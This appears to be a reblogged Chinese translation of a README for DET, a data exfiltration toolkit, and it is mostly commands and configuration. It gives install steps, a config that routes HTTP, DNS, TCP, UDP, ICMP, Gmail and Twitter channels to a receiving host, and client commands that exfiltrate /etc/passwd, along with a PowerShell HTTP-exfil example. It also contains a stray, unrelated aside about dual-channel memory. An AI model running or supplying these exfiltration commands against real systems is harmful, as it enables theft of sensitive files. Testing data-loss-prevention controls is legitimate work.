1. 首页
  2. 文章中心
  3. Other

黑客工具之DET——可扩展的数据渗出工具包

69 阅读 0 评论
我是靠谱客的博主 无私石头,这篇文章主要介绍黑客工具之DET——可扩展的数据渗出工具包,现在分享给大家,希望可以做个参考。

建议挂上vpn浏览学习哦

黑客工具之DET——可扩展的数据渗出工具包


DET是一个概念界定,描述能同时使用单独或多个通道执行数据渗透。

发明此概念的主要目的,就是确定可能的 DLP故障。它永远不应该用来评估敏感数据。

为了创建一个可以插入到任何协议/服务中的通用的具包,从而实施网络监测和数据泄漏预防(DLP)的配置方案,应对不同的数据溢出技术。

(tips:混合双通道是双通道内存中更为高端的一种形式,也是为了保护用户投资而产生的一种内存双通道模式。它通过主板和CPU共同技术支持,可以让CPU同时和不同型号的内存对接,甚至让CPU支持容量不同的两根内存条。)

 

1.幻灯片

卢布尔雅那大学在今年3月展示了详细的DET幻灯片,幻灯片在此:

https://docs.google.com/presentation/d/11uk6d-xougn3jU1wu4XRM3ZGzitobScSSMUlx0MRTzg/edit#slide=id.p

 

2.使用示例

ICMP插件:

服务器端:

 黑客工具之DET——可扩展的数据渗出工具包

黑客工具之DET——可扩展的数据渗出工具包

客户端:

 黑客工具之DET——可扩展的数据渗出工具包

黑客工具之DET——可扩展的数据渗出工具包

混合双通道(Gmail、Twitter)

服务器端:

 黑客工具之DET——可扩展的数据渗出工具包

黑客工具之DET——可扩展的数据渗出工具包

客户端:

黑客工具之DET——可扩展的数据渗出工具包

黑客工具之DET——可扩展的数据渗出工具包

3.安装

复制代码
1
git clone https://github.com/sensepost/DET.git
复制代码
1
pip install -r requirements.txt --user

4.配置

为了使用DET,需要配置它并添加适当的参数(如SMTP/IMAP,AES256加密密码等)。此处的配置文件名为:config-sample.json

复制代码
1
2
{
复制代码
1
2
    "plugins": {
复制代码
1
2
        "http": {
复制代码
1
2
            "target": "192.168.1.101",
复制代码
1
2
            "port": 8080
复制代码
1
2
        },
复制代码
1
2
        "google_docs": {
复制代码
1
2
            "target": "192.168.1.101",
复制代码
1
2
            "port": 8080,
复制代码
1
2
        },
复制代码
1
2
        "dns": {
复制代码
1
2
            "key": "google.com",
复制代码
1
2
            "target": "192.168.1.101",
复制代码
1
2
            "port": 53
复制代码
1
2
        },
复制代码
1
2
        "gmail": {
复制代码
1
2
            "username": "dataexfil@gmail.com",
复制代码
1
2
            "password": "ReallyStrongPassword",
复制代码
1
2
            "server": "smtp.gmail.com",
复制代码
1
2
            "port": 587
复制代码
1
2
        },
复制代码
1
2
        "tcp": {
复制代码
1
2
            "target": "192.168.1.101",
复制代码
1
2
            "port": 6969
复制代码
1
2
        },
复制代码
1
2
        "udp": {
复制代码
1
2
            "target": "192.168.1.101",
复制代码
1
2
            "port": 6969
复制代码
1
2
        },
复制代码
1
2
        "twitter": {
复制代码
1
2
            "username": "PaulWebSec",
复制代码
1
2
            "CONSUMER_TOKEN": "XXXXXXXXX",
复制代码
1
2
            "CONSUMER_SECRET": "XXXXXXXXX",
复制代码
1
2
            "ACCESS_TOKEN": "XXXXXXXXX",
复制代码
1
2
            "ACCESS_TOKEN_SECRET": "XXXXXXXXX"
复制代码
1
2
        },
复制代码
1
2
        "icmp": {
复制代码
1
2
            "target": "192.168.1.101"
复制代码
1
2
        }
复制代码
1
2
    },
复制代码
1
2
    "AES_KEY": "THISISACRAZYKEY",
复制代码
1
2
    "sleep_time": 10
复制代码
1
}


5.使用

使用帮助

复制代码
1
python det.py -h
复制代码
1
usage: det.py [-h] [-c CONFIG] [-f FILE] [-d FOLDER] [-p PLUGIN] [-e EXCLUDE]
复制代码
1
              [-L]
复制代码
1
 
复制代码
1
Data Exfiltration Toolkit (SensePost)
复制代码
1
 
复制代码
1
optional arguments:
复制代码
1
  -h, --help  show this help message and exit
复制代码
1
  -c CONFIG   Configuration file (eg. '-c ./config-sample.json')
复制代码
1
  -f FILE     File to exfiltrate (eg. '-f /etc/passwd')
复制代码
1
  -d FOLDER   Folder to exfiltrate (eg. '-d /etc/')
复制代码
1
  -p PLUGIN   Plugins to use (eg. '-p dns,twitter')
复制代码
1
  -e EXCLUDE  Plugins to exclude (eg. '-e gmail,icmp')
复制代码
1
  -L          Server mode


服务器端:

加载每一个插件:

python det.py -L -c ./config.json

只加载Twitter和Gmail模块:

复制代码
1
python det.py -L -c ./config.json -p twitter,gmail


加载每一个插件并排除DNS:

复制代码
1
python det.py -L -c ./config.json -e dns


客户端:

加载每一个插件:

复制代码
1
python det.py -c ./config.json -f /etc/passwd


只加载Twitter和Gmail模块:

复制代码
1
python det.py -c ./config.json -p twitter,gmail -f /etc/passwd


加载每一个插件并排除DNS:

复制代码
1
python det.py -c ./config.json -e dns -f /etc/passwd


在PowerShell(HTTP模块下)

复制代码
1
PS C:Usersuser01Desktop>
复制代码
1
PS C:Usersuser01Desktop> . .http_exfil.ps1
复制代码
1
PS C:Usersuser01Desktop> HTTP-exfil 'C:pathtofile.exe'


6. 适用模块

目前来讲, DET支持多种协议:

HTTPS  ICMP       DNS        SMTP/IMAP(eg.Gmail) Raw TCP  PowerShell的变形 (HTTP, DNS, ICMP, SMTP)

其他的“服务”:

Google Docs (未认证的)   Twitter (直接信息)

实验模块

到目前为止,正忙着实现的新模块,包括:

Skype (95% )   Tor (80%)     Github (30/40% )

 

 



本文由漏洞银行(BUGBANK.cn)小编  柠檬 翻译,源文译自 github.com



作者:柠檬
链接:http://www.bugbank.cn/news/detail/57e2312bbe4ed604719841c7.html
来源:漏洞银行
著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

最后

以上就是无私石头最近收集整理的关于黑客工具之DET——可扩展的数据渗出工具包的全部内容,更多相关黑客工具之DET——可扩展内容请搜索靠谱客的其他文章。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(46)

相关文章

tensorflow几何识别_TensorFlow也可以做图形渲染了:当神经网络遇上计算机图形学...
tensorflow几何识别_TensorFlow也可以做图形渲染了:当神经网络遇上计算机图形学...
python利用tensorflow识别图形_TensorFlow入门篇——day01.在virtualenv 中安装TensorFlow
python利用tensorflow识别图形_TensorFlow入门篇——day01.在virtualenv 中安装TensorFlow
一名黑客窃取了整个国家的个人财务数据
一名黑客窃取了整个国家的个人财务数据
python生成二维码
python生成二维码
黑客工具之DET——可扩展的数据渗出工具包
黑客工具之DET——可扩展的数据渗出工具包
2021年了,回头看看20世纪的黑客入侵事件内容一览总结
2021年了,回头看看20世纪的黑客入侵事件内容一览总结
python快速生成二维码
python快速生成二维码
python 自动生成属于自己的二维码
python 自动生成属于自己的二维码

评论列表共有 0 条评论

立即
投稿
返回
顶部